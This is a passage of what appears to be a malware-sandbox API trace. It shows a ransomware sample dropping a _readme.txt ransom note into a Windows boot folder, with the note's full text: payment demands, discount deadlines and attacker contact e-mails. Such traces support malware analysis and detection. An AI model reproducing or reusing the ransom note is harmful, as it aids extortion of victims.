hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.738] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.738] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.738] PathFindFileNameW (pszPath="") returned="" [0173.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.738] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.739] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.739] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.739] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8d2f0 [0173.740] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.740] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.740] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.740] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.740] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.741] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.741] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.742] CloseHandle (hObject=0x690) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.742] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.742] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.742] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.742] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e571780, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.742] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e571780, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.742] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.743] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: 